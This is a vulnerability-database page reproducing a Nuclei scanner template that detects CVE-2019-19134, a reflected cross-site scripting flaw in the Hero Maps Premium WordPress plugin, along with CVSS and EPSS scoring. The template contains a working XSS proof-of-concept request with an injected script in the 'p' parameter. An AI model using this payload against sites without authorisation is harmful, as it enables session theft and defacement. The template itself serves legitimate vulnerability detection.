Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2019-19134
HistoryJul 15, 2021 - 11:40 a.m.

WordPress Hero Maps Premium <=2.2.1 - Cross-Site Scripting

2021-07-1511:40:17
ProjectDiscovery
github.com
4

4.3 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

0.002 Low

EPSS

Percentile

58.6%

WordPress Hero Maps Premium plugin 2.2.1 and prior contains an unauthenticated reflected cross-site scripting vulnerability via the views/dashboard/index.php p parameter.

id: CVE-2019-19134

info:
  name: WordPress Hero Maps Premium <=2.2.1 - Cross-Site Scripting
  author: daffainfo
  severity: medium
  description: WordPress Hero Maps Premium plugin 2.2.1 and prior contains an unauthenticated reflected cross-site scripting vulnerability via the views/dashboard/index.php p parameter.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected website, leading to potential data theft, session hijacking, or defacement.
  remediation: |
    Update to the latest version of the WordPress Hero Maps Premium plugin (>=2.2.2) or apply the vendor-provided patch to fix the XSS vulnerability.
  reference:
    - https://wpscan.com/vulnerability/d179f7fe-e3e7-44b3-9bf8-aab2e90dbe01
    - https://www.hooperlabs.xyz/disclosures/cve-2019-19134.php
    - https://heroplugins.com/product/maps/
    - https://heroplugins.com/changelogs/hmaps/changelog.txt
    - https://nvd.nist.gov/vuln/detail/CVE-2019-19134
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2019-19134
    cwe-id: CWE-79
    epss-score: 0.00203
    epss-percentile: 0.58276
    cpe: cpe:2.3:a:heroplugins:hero_maps_premium:*:*:*:*:*:wordpress:*:*
  metadata:
    max-request: 1
    vendor: heroplugins
    product: hero_maps_premium
    framework: wordpress
  tags: cve,cve2019,wpscan,wordpress,xss,wp-plugin,maps,heroplugins

http:
  - method: GET
    path:
      - '{{BaseURL}}/wp-content/plugins/hmapsprem/views/dashboard/index.php?p=/wp-content/plugins/hmapsprem/foo%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'foo"></script><script>alert(document.domain)</script>'

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100ba131a3d954c96b2154ba671677f5e80a514bc39ffe5a790f2512276bdc33c0102200248428c70a41e0331c6dc3a86879f5a14e82955c691e23df0f5d9fb78d548fb:922c64590222798bb761d5b6d8e72950

4.3 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

6.1 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

0.002 Low

EPSS

Percentile

58.6%